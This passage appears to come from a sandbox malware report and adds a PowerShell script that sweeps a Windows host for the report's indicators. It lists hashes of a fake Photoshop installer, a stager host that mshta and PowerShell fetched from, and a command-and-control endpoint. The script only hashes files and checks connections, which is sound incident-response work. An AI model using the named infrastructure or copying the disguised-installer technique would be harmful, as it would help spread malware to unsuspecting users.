SHA256 d69d7e68a706c60146a5b530368d7818599dbd39d071f181963a89945cff3c29
SHA512 6ac5bcdcdd2c70cb5094a6c985a81df520a6cf9f622c0697e00c0e3e4081cdb967f3da9df2a04072552dff2f70c43c9e84c2b6f3bf81f3720983859dff46f56e

memory/2440-101-0x0000000000620000-0x0000000000F72000-memory.dmp

memory/3168-102-0x00000000005F0000-0x00000000005F1000-memory.dmp
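Taken together, the Files and Network sections give the host-side indicators a responder would sweep for: the two SHA256 values recorded for C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe, the SHA256 of Lyrufos.exe in the same directory, the stager host 91.92.251.35:80 that mshta.exe and powershell.exe fetched from, and the TCP connection to 146.70.169.164:2227 with no associated domain. The 8.8.8.8 reverse lookups and the tse1.mm.bing.net connections are background traffic of the Windows 10 detonation image rather than sample behaviour. The following PowerShell is an added example and not part of the report: it hashes executables under the current user's profile directories against those SHA256 values, checks live TCP connections against the two endpoints, and looks for the C:\Windows\Vss\%AppData% path that the "Drops file in Windows directory" signature recorded (forfiles was pointed at C:\Windows\Vss with /p). The directories searched and the name-based check are this example's own choices.

```powershell
# Added example (not from the report): sweep the local host for this report's file and
# network indicators. Hashes, names, paths and endpoints are copied from the Files,
# Network and Signatures sections; the search scope is an assumption.

$Sha256Iocs = @{
    '1cde83baf8606ef1df93264cdfa6af9889fbe4bd03f5584df62119d048f7687a' = 'Photoshop_Set-Up.exe (first hash listed)'
    '796c2a6de48e4206f14a87f6770990fd663423b2b1ce1ddef9a510123f2c5ead' = 'Photoshop_Set-Up.exe (second hash listed)'
    '69962181ff1d9d8f9dc80b1f91f8963aeb423f4e06f25ce3e81d22e16e1866ab' = 'Lyrufos.exe'
}
$DropperNames = @('Photoshop_Set-Up.exe', 'Lyrufos.exe')
$NetworkIocs  = @(
    @{ Address = '91.92.251.35';   Port = 80;   Note = 'stager host fetched by mshta.exe/powershell.exe' }
    @{ Address = '146.70.169.164'; Port = 2227; Note = 'outbound TCP during detonation, no domain' }
)

function Find-IocFiles {
    # Hash match first; then a name match, because a rebuilt dropper changes its hash but
    # often keeps its file name and drop location.
    param([string[]]$Roots = @($env:APPDATA, $env:LOCALAPPDATA),
          [hashtable]$Hashes = $Sha256Iocs, [string[]]$Names = $DropperNames)
    Get-ChildItem -Path $Roots -Filter *.exe -Recurse -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $h = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            if (-not $h) { return }
            $h = $h.ToLower()
            if ($Hashes.ContainsKey($h)) {           # PowerShell hashtable keys are case-insensitive
                [pscustomobject]@{ Indicator = $Hashes[$h]; Path = $_.FullName; SHA256 = $h }
            } elseif ($_.Name -in $Names -and $_.DirectoryName -eq $env:APPDATA) {
                [pscustomobject]@{ Indicator = 'dropper name in AppData\Roaming (hash differs)'; Path = $_.FullName; SHA256 = $h }
            }
        }
}

function Find-IocConnections {
    param([object[]]$Endpoints = $NetworkIocs)
    foreach ($ep in $Endpoints) {
        Get-NetTCPConnection -RemoteAddress $ep.Address -ErrorAction SilentlyContinue |
            Where-Object { $_.RemotePort -eq $ep.Port } |
            ForEach-Object {
                $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
                [pscustomobject]@{ Indicator = $ep.Note
                                   Remote    = '{0}:{1}' -f $_.RemoteAddress, $_.RemotePort
                                   State     = $_.State
                                   Process   = $proc.Path }
            }
    }
}

function Find-IocArtefacts {
    # Literal "%AppData%" directory under C:\Windows\Vss, as recorded by the
    # "Drops file in Windows directory" signature.
    $p = 'C:\Windows\Vss\%AppData%'
    if (Test-Path -LiteralPath $p) {
        [pscustomobject]@{ Indicator = 'forfiles /p working-directory artefact'; Path = $p }
    }
}

$hits = @(Find-IocFiles) + @(Find-IocConnections) + @(Find-IocArtefacts)
if ($hits) { $hits | Format-List } else { 'No indicators from this report found on this host.' }
```

Hash hits are conclusive for the binaries as they existed at detonation time; name and artefact hits only say that the same dropper pattern ran and warrant pulling the files for analysis. The connection check only sees sessions that are open when it runs, so proxy or firewall logs remain the place to search for the two endpoints historically.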